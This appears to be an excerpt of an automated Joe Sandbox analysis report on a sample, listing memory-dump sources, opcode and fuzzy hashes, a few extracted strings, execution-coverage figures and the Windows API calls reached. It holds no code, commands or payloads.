                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8283c736606910b5ab40e600beac339cc765e0bd4294ca3ab9b36843644fcf3
                                                    • Instruction ID: e6ba17d1dfbce78f53ebb562913a8d8c8aa2a77ed0dc50dbe41f58f46224bb10
                                                    • Opcode Fuzzy Hash: f8283c736606910b5ab40e600beac339cc765e0bd4294ca3ab9b36843644fcf3
                                                    • Instruction Fuzzy Hash: 7E513A36F0D53ECAD368BF98A4615F9B750EF08354B1502B7D21EC71D2CE2A69018F80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09666e6a9bc807aa37fce492ec4ff2d32237692eb47cd995053bbb2c24397664
                                                    • Instruction ID: b5c6f12a0a936c62f87da24d19bfe27268aa6e4f393f64ea0a2ad96e000a5681
                                                    • Opcode Fuzzy Hash: 09666e6a9bc807aa37fce492ec4ff2d32237692eb47cd995053bbb2c24397664
                                                    • Instruction Fuzzy Hash: 73C19130B18A1D8FDB98DF58C8999B9B3E2FF59314B1541A9D04EC72A6DA35FC42CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ecf781c9af1807c47aa54dfc6abfcb1272f5cbaa0caa4a306855d68e6b642afd
                                                    • Instruction ID: d631582760e59ef7ad3d2df053a3288cf24a312e74df77d34de98a43c7fe3728
                                                    • Opcode Fuzzy Hash: ecf781c9af1807c47aa54dfc6abfcb1272f5cbaa0caa4a306855d68e6b642afd
                                                    • Instruction Fuzzy Hash: 83D19070A1956A8FEB58CF48C4E05B137A1FF89310B5546FDC94F8B69BC639E982CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6bead22c729b87836147981c967d7cd868eb63cd12df4494927b564b1af2972
                                                    • Instruction ID: 68c9158c36a8d1b32a2032ffb903a868a5f43c2d6fc90bade4fa6c5d53eeebfe
                                                    • Opcode Fuzzy Hash: a6bead22c729b87836147981c967d7cd868eb63cd12df4494927b564b1af2972
                                                    • Instruction Fuzzy Hash: 50C1B130A1956A8BEB1DCF58C4E05B137A1FF89310B5546FDC94F8B69BCA39E981CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d92715830c5fb9d8a91dbdcdede38d056ab5a9334e2ea588b8cf7a5682ae439d
                                                    • Instruction ID: d2c178e17048365c93f2af9f978cd3ade9dcec8d3ad35ea7d7348ef67a64934c
                                                    • Opcode Fuzzy Hash: d92715830c5fb9d8a91dbdcdede38d056ab5a9334e2ea588b8cf7a5682ae439d
                                                    • Instruction Fuzzy Hash: BE412935F0E97ECAE7799F9494611F97BA0EF58300F1502BAD16DC61E2CD2A69408B41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a3a87f3906f5c36ba6cd4b6bda0f9eecc7d6886ebda9a0fedad5ec0b403d982
                                                    • Instruction ID: 95e5404e0d001b7a45b1ba6f4a9d51256c4378e5c7efb79aa66049ed4f8b44b6
                                                    • Opcode Fuzzy Hash: 3a3a87f3906f5c36ba6cd4b6bda0f9eecc7d6886ebda9a0fedad5ec0b403d982
                                                    • Instruction Fuzzy Hash: 9EC1F530B0DA5A8FE759DF58C4A06A4B7A0FF48300F4542BAC14EC7A96DB39B955CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d3122caa6e46e028e1e66d040ef1c333deef83856a82017fe66303c88f9daf44
                                                    • Instruction ID: 8c70c52405c6d19a3542ef71bfe5df4d385e267060572dd72ee98ef6b304f40b
                                                    • Opcode Fuzzy Hash: d3122caa6e46e028e1e66d040ef1c333deef83856a82017fe66303c88f9daf44
                                                    • Instruction Fuzzy Hash: 07C1F630F09A5B8FE759DF68C4A06A0B7A1FF44300F4542BDD54EC7AA6CB29B951CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e97d2eec606029781386cad1ea643eb6efbe683dc06914a659ee22ba3a3a8208
                                                    • Instruction ID: 0dbb21c941f360497c324768dc3779f660af82efc9421cb4e7b0c56839c3ff09
                                                    • Opcode Fuzzy Hash: e97d2eec606029781386cad1ea643eb6efbe683dc06914a659ee22ba3a3a8208
                                                    • Instruction Fuzzy Hash: 8F914A7AE0F5BE5FF7619EA898B54F87BA0EF40340F0502B6D14D879E3DD1A65018B42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f82b913b1d98b617f29bc773b3f6a65989dc645f687ba408935e42b6d0958e1a
                                                    • Instruction ID: 1daff82293dd86e546ba58f5b28be5547671bb720b6c5b35b6dcb79701d980a1
                                                    • Opcode Fuzzy Hash: f82b913b1d98b617f29bc773b3f6a65989dc645f687ba408935e42b6d0958e1a
                                                    • Instruction Fuzzy Hash: B781C031F0DA1A8FE7B85EA89464075B7D4FF45310F150A7ED58EC31A3DE29BA068B41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 724c366532fc263e6670f1a820c4d26d9c79caa7dcb97458b8ff6dc5a0bf648c
                                                    • Instruction ID: cc1d49b51c7a5057b1fc581f87964339cafb2f85a31b113d1de1ced5e7787f30
                                                    • Opcode Fuzzy Hash: 724c366532fc263e6670f1a820c4d26d9c79caa7dcb97458b8ff6dc5a0bf648c
                                                    • Instruction Fuzzy Hash: E6813931B0E65E4FEB385ED8A4650757BE0EF45310B15067ED18EC31A2DE2AFA028B52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22bf8123ec86871637c5d7d07de5139e586b130b6e41587864e5aae05972bf99
                                                    • Instruction ID: 34f8741e469dc63c49271b17108392faee0452d99242270c67ebda9ecc3f6729
                                                    • Opcode Fuzzy Hash: 22bf8123ec86871637c5d7d07de5139e586b130b6e41587864e5aae05972bf99
                                                    • Instruction Fuzzy Hash: C7716A72B0E45D4FE778DE6988664B437C0FF48710B1203BAD15EC75B2DF19A9068B81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d48a7cd6c1af7a084ea8465624b96339b41a722f9d88bc1274d3e989f6fc9feb
                                                    • Instruction ID: 91fb96a042d55e3812fe7df749c108488126a49cbecee55c8b623820d9818dc4
                                                    • Opcode Fuzzy Hash: d48a7cd6c1af7a084ea8465624b96339b41a722f9d88bc1274d3e989f6fc9feb
                                                    • Instruction Fuzzy Hash: 9271D430E1D55E8EEBA9DFA488645BCBBA0FF45300F5102BAD10EC71A6DE296941CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d0614f270617f10be3c4006a29ec97a1f64dbc1799c5f769d9879fb4d47a26d
                                                    • Instruction ID: f1325a4006ca9f78520cf7c22645bc4eacb59af276f27298cbc27df95da9426b
                                                    • Opcode Fuzzy Hash: 2d0614f270617f10be3c4006a29ec97a1f64dbc1799c5f769d9879fb4d47a26d
                                                    • Instruction Fuzzy Hash: 4771C330E2E55E8EEB69DFA488645BC7BA1FF45300F5502BAD10FC71E1DE2A6A41CB01
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 451087ee634bdffaacec3fcd2fe8d6e738538bd8427caaa11f511c679f5ec7e0
                                                    • Instruction ID: f7a7cde54592d15643e465e61b176e4cdd4e4074abb9236ef8c0cc4871a75b43
                                                    • Opcode Fuzzy Hash: 451087ee634bdffaacec3fcd2fe8d6e738538bd8427caaa11f511c679f5ec7e0
                                                    • Instruction Fuzzy Hash: 07112731B0991D4EEF68EBA4D4615F97390FF58351F40067AE10EC75E2DF29B6068B80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: effb662fc69697cb03c21010393065413151e9d4c389f82480d253f42e93f9aa
                                                    • Instruction ID: 90c75c6588b041854d520829f85b1e32cc9a7cea9cd4357f0740b3e415db8d5c
                                                    • Opcode Fuzzy Hash: effb662fc69697cb03c21010393065413151e9d4c389f82480d253f42e93f9aa
                                                    • Instruction Fuzzy Hash: 6B11C631B0961C8FEB58DF58D869AB9B3E1FF49311F01027AD14EC75A2CB216D41CB01
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f098a020b739d5eb30f6bfad6f840e814252adea7434777626ed5416be67410e
                                                    • Instruction ID: 7cfc85103babe623d848c124ffffff3729641fadb1e90756c17d6cfed1480611
                                                    • Opcode Fuzzy Hash: f098a020b739d5eb30f6bfad6f840e814252adea7434777626ed5416be67410e
                                                    • Instruction Fuzzy Hash: 22110131B0991A8ADBA8EEA484614F57390FF94351B400A7AE10EC75E2DF39BA058B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7cf617d7ff15b70007257dcd16948b18ab62a347539c351198bb4b73fc7ac169
                                                    • Instruction ID: 36bd0bec8424ae9f3d1f0c613d7a2f4b362e6cf879b2438d36831ff5024ef10f
                                                    • Opcode Fuzzy Hash: 7cf617d7ff15b70007257dcd16948b18ab62a347539c351198bb4b73fc7ac169
                                                    • Instruction Fuzzy Hash: E8114E3170950E8FEB699E98D8646F53390FF94361F060A7BEA0DC75E1DB366650CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13e94264358d2bde13a95b8bde89bd9ded913ea727f10f05c61518e71f13dc4c
                                                    • Instruction ID: 9ab6e91c7affbeb0ea2223e4f0f159faf6ee1e385f1409aef22af12f42c7e0fe
                                                    • Opcode Fuzzy Hash: 13e94264358d2bde13a95b8bde89bd9ded913ea727f10f05c61518e71f13dc4c
                                                    • Instruction Fuzzy Hash: 85116B3170550A8FEF299E98E8252F53390FF58361F05063BEA0DC72E1DB266654CB80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4669b30c59a1c2d42ed7244de5300209d7214a3a49bf7db961b7a34cc688e796
                                                    • Instruction ID: 177272364634177121e95cb728788efb9e3c6ab9c87080882fb381188948fbfc
                                                    • Opcode Fuzzy Hash: 4669b30c59a1c2d42ed7244de5300209d7214a3a49bf7db961b7a34cc688e796
                                                    • Instruction Fuzzy Hash: B5014931F0E65D4BFBF49AA448181BD3BD1DF49340F050A36E10EE71A1DD663E058B51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 352acee358f051056a56fdc822fc75c8b6261adfb1ebb1a4de2b7e4d28a7a1bc
                                                    • Instruction ID: d465bb2885c69ccf6fd168dc56212d6a42f311aabb1acdb69a7a1e3affbec1dd
                                                    • Opcode Fuzzy Hash: 352acee358f051056a56fdc822fc75c8b6261adfb1ebb1a4de2b7e4d28a7a1bc
                                                    • Instruction Fuzzy Hash: F6F02662E0E9AA4FE7789F9884714B47AE0EF54320F1603FAD55EC61E3ED1AB9404B01
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea66a77d9c0a3fca9dfd896abfcd23dcf26a09c180fe3718cb598d97bbcdfa90
                                                    • Instruction ID: 65cc82f8ba951445841a3448386e0cc907cdec9a750512fa93616a69f7742fee
                                                    • Opcode Fuzzy Hash: ea66a77d9c0a3fca9dfd896abfcd23dcf26a09c180fe3718cb598d97bbcdfa90
                                                    • Instruction Fuzzy Hash: 6CF0C23185F3C99FE3168FF088214A53FB4AF43200F1901FAD589870A2C96E1756CB62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                    • Instruction ID: 0ed2ba3747e0295febd287eff5c1c45b0385c45c76dcb67856906c7ca3f369e7
                                                    • Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
                                                    • Instruction Fuzzy Hash: A0010074A1992C8FDFA8DF48C8A4BA8B7B1FB68301F1041D9C00EE3250CB319A84CF01
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa2297d4496a6480479f25852d350b19a509d6bdbafcb33771d828bd2c326676
                                                    • Instruction ID: c9d7375912aeb66b00afa9736811afb308649b479ab05ab1b4cf13156d7adf26
                                                    • Opcode Fuzzy Hash: fa2297d4496a6480479f25852d350b19a509d6bdbafcb33771d828bd2c326676
                                                    • Instruction Fuzzy Hash: 23E09231D1E28C8BD7619F5089650ECBB60EF10300F1502F6DA0D060A2DB2657089A42
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
                                                    • Instruction ID: f8a20256a953020a9765622f4dae68d233e14309e5a5b0ee6e54573978519dca
                                                    • Opcode Fuzzy Hash: 2c6402dcd5610092e5edfd5ec823b54f2bbd2676520f37d38f42817b1682fe5d
                                                    • Instruction Fuzzy Hash: 22E08610B0E2D64BE7B60A7448744347B908F0B3447090FF5C24A4A1D3C92A39049B11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                    • Instruction ID: f48bf204071db8e46fd2f9d1aaf1e3865130c866196026a3b1dfd9699e110c90
                                                    • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                    • Instruction Fuzzy Hash: DED0C934B0F57F85F1B95E81803023D95914F08301E264A3DD25F418E1CE6FB7016E13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c95736e8b158f24f35fae0441b6a2a9885025fb07ad5ed8bdb50062498fc04d
                                                    • Instruction ID: 55c1ade6eecf6d9f2e64afa84f7d391da6df9fd2fa714bb308b460ec8ffb2f75
                                                    • Opcode Fuzzy Hash: 8c95736e8b158f24f35fae0441b6a2a9885025fb07ad5ed8bdb50062498fc04d
                                                    • Instruction Fuzzy Hash: DCD0C950B0F57F85F9795FC2A07123E5D909F00312E66463ED25F418E1CE2E77416E12
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e88a4588bcecabdc841a2214fd17d3ec03417a7012c8e0872ec366c0a0965b2
                                                    • Instruction ID: be597c701720bba039f8dae0be3cd2d18df7586949e5abc0c48744fd61accdbd
                                                    • Opcode Fuzzy Hash: 2e88a4588bcecabdc841a2214fd17d3ec03417a7012c8e0872ec366c0a0965b2
                                                    • Instruction Fuzzy Hash: 22C08C10F0E21B5BEA322AE0986003C6AA00F06200B4A0671D34A8A2E3CD8839002A51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #+_-$%VG%$%VG%$%VG%$LR*e$LR*e$l0,H
                                                    • API String ID: 0-2477165230
                                                    • Opcode ID: 3f4389f17d5ca1238805fdc7e870fc83c23ffd2b416a7b5f126f03b9b242335f
                                                    • Instruction ID: 782b900898d9b3ea790121f60d4ef3ff1d9cfcf8dc53cd6084123eefb75c7b5f
                                                    • Opcode Fuzzy Hash: 3f4389f17d5ca1238805fdc7e870fc83c23ffd2b416a7b5f126f03b9b242335f
                                                    • Instruction Fuzzy Hash: 1043C970A145298FDBA9EB54C8A5BA977F1FF48300F4041EAD05EA72A6DE356EC1CF40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .
                                                    • API String ID: 0-248832578
                                                    • Opcode ID: 3ad63eb4cb5c929d6548403b37a8b28d0fde14e71b1f050658ab695d6ab97d39
                                                    • Instruction ID: 2553cb5b9b7c7958a557abb47922bd01b381d5e8761771f49372cc9de43eebdf
                                                    • Opcode Fuzzy Hash: 3ad63eb4cb5c929d6548403b37a8b28d0fde14e71b1f050658ab695d6ab97d39
                                                    • Instruction Fuzzy Hash: BE718F71E5022ACFEBB0CF68C881BDDBBF0AB49310F4582E5D45CE7645E634AA858F51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0_^
                                                    • API String ID: 0-3200571790
                                                    • Opcode ID: e22e191552d30c32eac96e925fc68779dda7a7340eabdf47d7b02cfa7ee0621c
                                                    • Instruction ID: 131956277c82b0ed42e7dc852992b11b298dc0c469e27f4372d2dc87025f3391
                                                    • Opcode Fuzzy Hash: e22e191552d30c32eac96e925fc68779dda7a7340eabdf47d7b02cfa7ee0621c
                                                    • Instruction Fuzzy Hash: 2741B452A4F7EAAFE3169BBCECBA4D57F90AF0212871D41B7C0D48E0A3D945624BC251
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 683fdaffab96d1c070d6c19c0e8b562300ba0eba856a9ca39517461bf793a189
                                                    • Instruction ID: 145aaecbddb507c4226a240004cd1f082f12fc04fcd7b96568026a43205f6ffc
                                                    • Opcode Fuzzy Hash: 683fdaffab96d1c070d6c19c0e8b562300ba0eba856a9ca39517461bf793a189
                                                    • Instruction Fuzzy Hash: BB31E270E18A1D8FCF84DF98C451AADBBF1FB69300F2011AAD419E3291D675AA41CB44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b048e22cc16694eeb579ad8bfc232516b156e60529c7c29e86a9b6264fe0dc0
                                                    • Instruction ID: 726e22cc1a243ae7472b8ca418d2950338fa09a94ae9f9afe3ff42b259b2751e
                                                    • Opcode Fuzzy Hash: 7b048e22cc16694eeb579ad8bfc232516b156e60529c7c29e86a9b6264fe0dc0
                                                    • Instruction Fuzzy Hash: E4313631A0D29ADFD7199B64E8655EA7BE0EF01318B1401BBD089C70A3DB786655D780

                                                    Execution Graph

                                                    Execution Coverage: 5.3%
                                                    Dynamic/Decrypted Code Coverage: 81.2%
                                                    Signature Coverage: 0%
                                                    Total number of Nodes: 16
                                                    Total number of Limit Nodes: 0
                                                    execution_graph (graph rendering not recoverable): the reached nodes call GetFileAttributesW, CloseHandle, VirtualAlloc, SuspendThread and ResumeThread

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2978167517.00007FFD9BAE6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE6000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffd9bae6000_ctfmon.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: U$U
                                                    • API String ID: 0-2145350036
                                                    • Opcode ID: 824164d5f9818dc3b06a96e0bf6f57d306187580c9f6d0331506bfbd967a87a9
                                                    • Instruction ID: d5e7aeb9b870c2567b445b7ed7a15bbe766f07b4033b4b74a71d7b15c346e382
                                                    • Opcode Fuzzy Hash: 824164d5f9818dc3b06a96e0bf6f57d306187580c9f6d0331506bfbd967a87a9
                                                    • Instruction Fuzzy Hash: BA51AD3090978D8FDB55DF64C915AEA7BF0FF05304F4501AAE858C71E2DB38AA58CB91

